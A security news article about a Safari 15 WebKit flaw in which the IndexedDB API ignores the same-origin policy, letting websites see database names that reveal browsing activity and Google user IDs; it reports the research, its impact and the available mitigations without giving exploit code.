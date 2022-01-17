



There is a problem with the implementation of the IndexedDB API in Safari’s WebKit engine, which can leak real-time browsing activity and even user IDs to anyone who exploits this flaw.

IndexedDB is a widely used browser API that is a versatile client-side storage system with unlimited capacity.

It is typically deployed to cache web application data for offline viewing, but modules, development tools, and browser extensions can also be used to store sensitive information.

To prevent data leakage from cross-site scripting attacks, IndexedDB follows a “same-origin” policy to control the resources that can access each piece of data.

However, FingerprintJS analysts discovered that the IndexedDB API did not comply with the same-origin policy of the WebKit implementation used by Safari 15 on macOS, leading to the disclosure of sensitive data.

This privacy violation bug also affects web browsers that use the same browser engine on the latest iOS and iPad OS versions.

Safari 15 issues

By violating the same-origin policy, implementing IndexedDB on Safari 15 on iOS, iPadOS, and macOS will allow any website to render database names created in the same session.

Database names are usually unique and website-specific, so this is basically like leaking your browsing history to anyone.

To make matters worse, some database names have user-specific identifiers (after login), so this API leak can lead to user identification.

Impact and mitigation

According to analysts, to identify anyone from this flaw, you need to log in to a popular website such as YouTube or Facebook, or to a service such as Google Calendar or Google Keep.

When you log in to these sites, a new IndexedDB database will be created with your Google User ID added to its name. If you use multiple Google accounts, a separate database will be created for each account.

“I checked the homepages of Alexa’s top 1000 most visited websites and used IndexedDB to understand how many websites they can uniquely identify by the databases they interact with,” the Fingerprint JS report said. increase.

“The results show that over 30 websites interact directly with the indexed database on the home page without the need for additional user interaction or authentication.”

“This number is likely to be significantly higher in real-world scenarios because the website can interact with the database on subpages, after certain user actions, or on the authenticated part of the page.”

When a subresource creates a UUID (Universally Unique Identifier) ​​database, Safari’s antitracking system intervenes to block information leakage. The ad blocking extension further enhances this positive side mitigation effect.

Safari 15’s private mode will continue to be affected, but each browsing session will be limited to a single tab. Therefore, the scope of information that can be leaked is limited to websites accessed from at least that one tab.

Note that this is a WebKit issue, so browsers that use this particular engine (for example, Brave or Chrome for iOS) are also vulnerable.

To determine the impact of the bug on your browser, please visit this demo page and reproduce the API leak.

Safari on iPadOS 15.2 leaks browsing history (Bleeping Computer)

This vulnerability was reported to WebKitBug Tracker on November 28, 2021, but has not yet been addressed at the time of this writing.

One way to mitigate the issue until a security update is available is to block all JavaScript, which is a radical measure that can cause functional issues on many web pages.

Switching to a non-WebKit-based web browser is the only viable solution, but it only applies to macOS. On iOS and iPad OS, all web browsers are affected.

